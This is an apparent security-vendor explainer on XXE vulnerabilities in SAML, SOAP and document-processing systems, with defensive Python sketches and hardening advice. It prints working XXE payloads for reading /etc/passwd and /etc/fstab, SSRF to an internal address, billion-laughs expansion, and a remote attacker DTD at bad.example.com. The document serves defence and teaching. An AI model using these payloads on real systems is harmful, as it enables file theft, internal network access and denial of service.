XML external entity (XXE) vulnerabilities still show up in enterprise environments because XML is embedded in high-value workflows such as SAML-based single sign-on (SSO), SOAP integrations, and services that parse XML-backed document formats. When enterprise XML parsers run with permissive defaults or inherited configurations that allow an external entity reference to be resolved, attackers can abuse that behavior to read local files or trigger server-side requests to internal systems.
An XXE vulnerability occurs when an application processes untrusted XML input with an XML processor that allows external entity resolution, often via external DTD processing.
In the past, XXE was a prominent enough risk to get its own OWASP Top 10 category in 2017. In later OWASP Top 10 editions, XXE has been grouped under the broader category of security misconfigurations. This is a reminder that many XXE weaknesses are ultimately caused by unsafe parser configuration rather than bad XML.
An XML external entity (XXE) vulnerability, also called XML external entity injection or XXE injection, occurs when a server-side XML parser processes untrusted XML and is allowed to resolve external entities. External entities in XML can reference local files or remote URLs, so a vulnerable parser may fetch sensitive data from the filesystem or make network requests on an attacker’s behalf. This can enable impacts such as file disclosure, credential and configuration leakage, and server-side request forgery (SSRF) against internal services, including internal HTTP endpoints.
While less common in modern tech stacks, XXE risks may persist in older enterprise systems where XML is still used in SAML authentication flows, legacy SOAP APIs, and document processing pipelines, especially when parser settings are shared across multiple applications and teams.
When XXE resolution is exploitable, possible outcomes usually map to two main attacker goals: steal data and reach internal services. Depending on the application behavior and parser configuration, attackers may be able to:
Read local files such as /etc/passwd, application configuration files, keys, and environment-specific secrets
XXE rarely appears in brand-new, JSON-only APIs. It can, however, show up in legacy systems where XML is still a core data exchange format and where parsing is handled by shared libraries or middleware with permissive defaults.
SAML uses XML for its assertions and signatures. Implementations often parse SAML assertions and metadata using shared XML libraries, and XXE becomes possible when those underlying parsers are not hardened. This is one reason XXE can surface in authentication and identity integration paths – not because SAML somehow “requires” unsafe parsing, but because parser settings are easy to inherit and hard to standardize across identity services, gateways, and downstream applications.
SOAP is still common in enterprise environments, B2B integrations, and internal service ecosystems that have been running for years. Even if a company’s primary APIs are REST/JSON, a legacy part of the stack may still accept XML payloads for interoperability and backend access, sometimes through middleware that centralizes parsing behavior. Real-world exposure is often tracked through CVE advisories that apply to specific SOAP stacks, libraries, or gateways.
Many systems accept uploads that end up being parsed as XML, even if the user never uploads a file with an explicit .xml extension. Common examples of XML-based formats include Office Open XML documents (DOCX, XLSX, PPTX), OpenDocument files, and SVG images.
XML-reliant pipelines are particularly risky because they are easy to overlook during API reviews and they often run with broad filesystem and network access. In practice, some of the most important attack vectors are indirect, where an attacker uploads a document and a backend service parses the XML embedded in it.
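As a rough illustration of how an indirect XML path can be inspected before any parsing happens, the following sketch lists the XML parts inside a ZIP-based document container (such as an Office Open XML file) that contain a DOCTYPE declaration. The function name `find_dtd_parts`, the suffix list, and the size limit are assumptions made for this example, not part of any specific product or library.

```python
import io
import zipfile

# Assumed part-name suffixes for XML content inside the container;
# adjust this tuple for the document formats you actually accept.
XML_SUFFIXES = (".xml", ".rels")


def find_dtd_parts(document_bytes, max_part_size=10 * 1024 * 1024):
    """Return names of XML parts in a ZIP container that look risky.

    A part is reported if it contains a DOCTYPE declaration or if it is
    larger than max_part_size (and is therefore not inspected at all).
    """
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(document_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            if info.file_size > max_part_size:
                suspicious.append(info.filename)
                continue
            data = archive.read(info)
            # Plain byte search: this misses UTF-16 encoded parts, so it is
            # a triage aid and not a replacement for a hardened parser.
            if b"<!DOCTYPE" in data:
                suspicious.append(info.filename)
    return suspicious
```

A check like this can flag uploads for rejection or closer review, but the parser that eventually processes the parts still needs to be configured safely.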
Enterprise service buses (ESBs), integration platforms, gateways, and transformation services frequently ingest and transform XML between systems. If these shared components parse untrusted XML from partners, users, or downstream systems, one permissive parser configuration can create a broad blast radius.
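For XML external entity injection to be possible, two conditions typically need to be true: the application parses XML that an attacker can supply or influence, and the XML parser is configured to resolve external entities, often through DTD processing.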
The key point is that the XML parser performs the dangerous action. If an entity references a local file or a URL, the parser may read that file or fetch that URL from the server’s local environment. This is why XXE often leads to file disclosure and SSRF – because the request originates from the server, not the attacker’s machine. It’s also why XXE frequently persists as a configuration issue: the same parser settings may be reused in multiple applications and services.
XML parsers can use a document type definition (DTD) to define entities, alongside other approaches such as XML schema definitions (XSD) that constrain document structure. An entity is a placeholder that the parser expands during parsing, and external entities are ones whose values are retrieved from an external source, such as a local file or a remote URL. If external entities are enabled even for untrusted input, attackers can coerce the parser into retrieving sensitive content or reaching internal network resources.
In practice, the risk often maps directly to specific parser implementations and their configuration options. Common examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, and DOMParser for JavaScript. Defaults and safe configuration patterns vary by library and runtime, so teams should verify parser behavior rather than assume it is secure by default. This is also where vendor ecosystems matter – for example, Apache and Microsoft stacks may expose different parser defaults and hardening settings depending on the library and runtime.
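One way to verify parser behavior instead of assuming it is to run a harmless probe against the exact parser configuration in use. The sketch below writes a random canary string to a temporary file, references that file through an external entity, and reports whether the canary shows up in the parsed output. The names `probe_external_entities` and `elementtree_text` are hypothetical helpers for this example, and the ElementTree wrapper is only one possible target.

```python
import os
import tempfile
import uuid
import xml.etree.ElementTree as ET
from pathlib import Path


def probe_external_entities(parse_to_text):
    """Classify how a parser handles an external entity that points at a file.

    parse_to_text is any callable that takes XML bytes and returns the parsed
    content as a string. Returns "resolved", "not resolved", or "rejected".
    """
    canary = "XXE-CANARY-" + uuid.uuid4().hex
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(canary)
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{Path(path).as_uri()}">]>\n'
            "<foo>&xxe;</foo>"
        ).encode("utf-8")
        try:
            text = parse_to_text(payload)
        except Exception:
            return "rejected"  # the parser refused the document
        # The canary can only appear if the parser read the local file.
        return "resolved" if canary in text else "not resolved"
    finally:
        os.unlink(path)


def elementtree_text(data):
    """Example target: parse with ElementTree and serialize the result."""
    return ET.tostring(ET.fromstring(data), encoding="unicode")


if __name__ == "__main__":
    print(probe_external_entities(elementtree_text))
```

Any result other than "resolved" suggests that this particular configuration did not read the file. The same probe can be pointed at other parser wrappers in a test suite so that a library upgrade or configuration change that re-enables entity resolution is caught early.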
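XXE is commonly described in three forms: in-band, where the resolved entity content is returned directly in the application response; out-of-band (OOB), where the result is observed through a separate channel such as a DNS or HTTP callback; and blind, where nothing is reflected and success has to be inferred from indirect signals.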
This article focuses on in-band examples, but the same root causes apply to OOB and blind variants.
XXE attacks typically inject a malicious DTD that defines an external entity and then reference that entity in the document so the parser expands it. Payload syntax varies by parser and library settings, but the underlying idea is the same.
A classic XXE payload defines an entity that reads a local file and then returns its contents in the application response. The attacker might send an HTTP request like:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
If the attack succeeds and the parser resolves the &xxe; external entity defined as the local password file, the HTTP response might include the contents of that file:
HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
If the application reflects parsed XML content back to the client, this is the simplest path to data theft.
If the parser is allowed to resolve external entities over HTTP(S), an attacker can use XXE to make the server request internal resources. This is a form of SSRF, but delivered through the XML parser. This time, the external entity references an internal HTTP resource:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://192.168.0.1/secret.txt">
]>
<foo>&xxe;</foo>
If successful, the attack could return the contents of the secret.txt file from the internal network.
Because the server makes the request from inside the network, XXE-based SSRF can bypass protections such as IP allowlists, perimeter firewalls, and segmentation that assume external users cannot reach internal services. In some environments, the same mechanism can also be used for internal service discovery and limited port probing, depending on how connection failures are signaled.
Entities can also be defined in terms of other entities. Attackers can use this feature to force exponential entity expansion that consumes CPU and memory to cause a denial of service. A well-known form is the “billion laughs” pattern, named after the use of lol as the string in early examples.
Even this short example would cause the “World” in a “Hello World” string to be expanded 40 times:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>Hello &t3;</foo>
Larger payloads can cause far larger expansions, which is why this technique is also called an XML bomb. The result can be parsing failures, service degradation, or complete unavailability, depending on resource limits and safeguards.
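The expansion arithmetic for nested entities can be checked without actually expanding anything. The following sketch extracts internal entity declarations with a regular expression and computes the fully expanded length of an entity using memoization. The helper names `parse_entities` and `expanded_length` are assumptions for this example, and the regex only handles simple double-quoted internal entities that reference declared, non-recursive entities.

```python
import re

# Matches simple internal general entities: <!ENTITY name "value">
ENTITY_DECL = re.compile(r'<!ENTITY\s+([\w.-]+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&([\w.-]+);")


def parse_entities(dtd_text):
    """Map entity names to their unexpanded replacement text."""
    return dict(ENTITY_DECL.findall(dtd_text))


def expanded_length(name, entities, _cache=None):
    """Return the character count of an entity after full expansion.

    Works on lengths only, so even a very large bomb is cheap to measure.
    Assumes every referenced entity is declared and there are no cycles.
    """
    cache = {} if _cache is None else _cache
    if name not in cache:
        value = entities[name]
        literal_chars = len(ENTITY_REF.sub("", value))
        nested = sum(
            expanded_length(ref, entities, cache)
            for ref in ENTITY_REF.findall(value)
        )
        cache[name] = literal_chars + nested
    return cache[name]


DTD = """
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
"""

entities = parse_entities(DTD)
copies = expanded_length("t3", entities) // len(entities["bar"])
print(copies)  # 40, i.e. 2 * 4 * 5 copies of "World "
```

Because each level multiplies the size of the one below it, adding a few more levels with ten references each is enough to reach gigabytes of output from a payload of a few hundred bytes.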
Many real systems won’t reflect the parsed entity contents directly, while others may block specific patterns but leave the underlying unsafe behaviors available. The following concepts help explain why XXE can often still be exploited in practice.
In many in-band scenarios, the server response is generated from parsed XML. If the exfiltrated content contains any characters that are not valid in the response’s XML context, parsing may fail or the data may be mangled. This is a practical limitation of the way XML parsers interpret syntax, not a guarantee of safety.
For example, if an included file contains characters such as < or &, the parser may treat them as markup rather than plain text and raise an error. This is where CDATA sections are useful.
CDATA sections allow XML documents to include characters that would otherwise be treated as markup. XML also supports parameter entities, which are used within DTDs. By combining parameter entities with CDATA, attackers can sometimes wrap extracted content so it can be safely returned in an XML response.
A common pattern is to reference an attacker-hosted DTD that defines entities to read a local file and wrap it in CDATA, then define a general entity that the document can safely include. Conceptually, a payload may look like this:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://bad.example.com/evil.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>
The attacker-hosted evil.dtd definition file that extracts and wraps file contents might look something like:
<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
If the parser is allowed to fetch external DTDs and resolve external entities, it will load the remote DTD, read the local mount points file via %file;, wrap it in CDATA using %start; and %end;, and expose the result through &fileContents;. The definitions are hosted in an external DTD because XML does not allow parameter entity references inside markup declarations in the internal DTD subset. This is one way XXE can remain exploitable even when simple in-band payloads fail due to XML parsing constraints.
Some XML processing pipelines support additional inclusion mechanisms such as XInclude. These are not the same as DTD-based external entities, but they can create similar risk if untrusted XML can trigger server-side inclusion or fetching behavior. The key control remains the same: do not allow untrusted XML to drive server-side retrieval of external resources.
In some PHP environments, protocol wrappers can provide additional file access behaviors. For example, the php://filter wrapper can base64-encode file contents. Base64 output is XML-safe, which can help with extracting data that would otherwise break XML parsing, including binary content.
Here’s an example request that fetches the local mount points file via the PHP filter:
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>&bar;</foo>
Any such XXE capability is heavily environment-dependent and should not be treated as universal, but this example does illustrate why “we blocked file reads” is not always the end of the story if external entities remain enabled.
The right detection method depends on whether you are trying to validate a known exposure or find unknown instances in your own code and services.
If you rely on third-party platforms, middleware, or libraries that parse XML, you can sometimes identify risk through versioning and dependency insight. Software composition analysis (SCA) can help uncover vulnerable parser libraries or XML-processing components. In some enterprise environments, XML parsing may be implemented inside products, gateways, or middleware. In those cases, version identification combined with vendor advisories, CVE tracking, and, where appropriate, network scanning can be a practical first pass for known issues.
This approach helps you understand potential exposure, but it does not prove exploitability in your environment.
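To confirm an XXE issue in an application you run or build, you typically need evidence that the parser resolved an external entity. That evidence may be provided by file content returned in the response (in-band), or by a controlled DNS or HTTP callback or another observable signal showing that the parser attempted to fetch an external resource (OOB and blind).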
Manual testing can be effective for complex, context-dependent flows (for example, SAML and document processing pipelines). Automated dynamic testing (DAST) can help scale discovery and verification across large application and API estates, especially when the goal is to prove which issues are exploitable and where they exist in running systems.
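For callback-based evidence in a test environment you control, a small listener that ties each probe to a unique token is often enough. The sketch below is a minimal, assumption-laden example: the class name `CallbackRecorder`, its methods, and the loopback address are all hypothetical choices for illustration, and a real setup would need an address the target system can actually reach.

```python
import http.server
import threading
import uuid


class CallbackRecorder:
    """Tiny HTTP listener that records which probe tokens were requested."""

    def __init__(self, host="127.0.0.1", port=0):
        self.hits = []
        recorder = self

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                recorder.hits.append(self.path)  # remember the requested path
                self.send_response(204)
                self.end_headers()

            def log_message(self, format, *args):
                pass  # suppress default request logging

        # Port 0 asks the OS for any free port.
        self.server = http.server.HTTPServer((host, port), Handler)
        self.base_url = "http://%s:%d" % self.server.server_address[:2]

    def start(self):
        threading.Thread(target=self.server.serve_forever, daemon=True).start()
        return self

    def stop(self):
        self.server.shutdown()
        self.server.server_close()

    def new_probe(self):
        """Return a unique token and an XML payload that references it."""
        token = uuid.uuid4().hex
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{self.base_url}/{token}">]>\n'
            "<foo>&xxe;</foo>"
        )
        return token, payload

    def was_hit(self, token):
        """True if any recorded request path contains the token."""
        return any(token in path for path in self.hits)
```

Submitting the payload to the application under test and then calling `was_hit(token)` shows whether that specific request caused the parser to fetch the URL. A missing callback is not proof of safety, since outbound traffic may simply be blocked.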
Preventing XXE is primarily about ensuring safe parser behavior. Input filtering is a weak control for XXE because many applications legitimately accept complete XML documents, and any ad-hoc sanitization tends to be brittle and easy to bypass.
Ensure your XML parser does not resolve external entities when processing untrusted input. In practice, this usually means disabling DTD processing, external entity resolution, and the loading of external DTDs.
Use parser configurations that explicitly disallow external entity resolution and external DTD processing. Do not rely on default settings, especially when upgrading libraries or switching XML processing implementations across services. In many environments, the practical action to take is to disable DTDs and block any server-side resolution of external resources.
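As one possible way to apply the "disable DTDs" advice with only the Python standard library, the sketch below runs a first pass with the low-level expat parser and refuses any document that contains a DOCTYPE declaration before handing it to ElementTree. The names `DTDForbidden` and `parse_untrusted` are assumptions for this example. Libraries such as defusedxml package similar checks, and other languages expose equivalent switches through their own parser settings.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a document type declaration."""


def _refuse_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE ...".
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")


def parse_untrusted(xml_bytes):
    """Parse XML bytes into an Element, rejecting any document with a DTD.

    The input is parsed twice: once to check for a DOCTYPE, once to build
    the tree. Malformed input raises an expat or ElementTree parse error.
    """
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _refuse_doctype
    checker.Parse(xml_bytes, True)
    return ET.fromstring(xml_bytes)
```

Rejecting the DOCTYPE outright blocks both external entities and entity expansion bombs, because neither can be declared without a DTD. The trade-off is that documents with a legitimate DTD are refused as well.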
If DTDs are required for legitimate functionality, allow only local static DTDs and block all external fetches.
Keep XML libraries and XML processing components up to date, including in middleware and document conversion services. Note that in enterprise systems, XML parsing often happens in shared components that may not be owned by the application team.
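Incorporate XML-backed file formats and identity integration flows into your threat model and test scope, for example SAML endpoints, SOAP services, document upload and conversion pipelines, and middleware that transforms XML.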
Refer to the OWASP XML External Entity Prevention Cheat Sheet for language- and parser-specific hardening steps.
XXE is still a relevant risk. Even when modern application development favors JSON, XML remains common in enterprise identity workflows (SAML), legacy integrations (SOAP), and document processing. XXE continues to appear whenever XML parsers are deployed with permissive configurations or when teams overlook indirect XML parsing paths such as file conversion services and middleware transformations.
XXE can also lead to SSRF. If the parser resolves external entities via URLs, it can be tricked into making HTTP requests from the server to internal or restricted resources. Because the request originates inside the environment, it can reach services that are not exposed externally and can bypass network controls that assume the attacker is outside the perimeter.
Reliable detection usually requires proof that the target resolved an external entity. In an in-band case, that may be file content returned in the response. In OOB and blind cases, detection may rely on a controlled callback (DNS or HTTP) or other observable signals that indicate the parser attempted to fetch external resources. Because many enterprise environments restrict outbound traffic, XXE testing may also require controlled egress monitoring in a safe test environment to avoid false negatives.
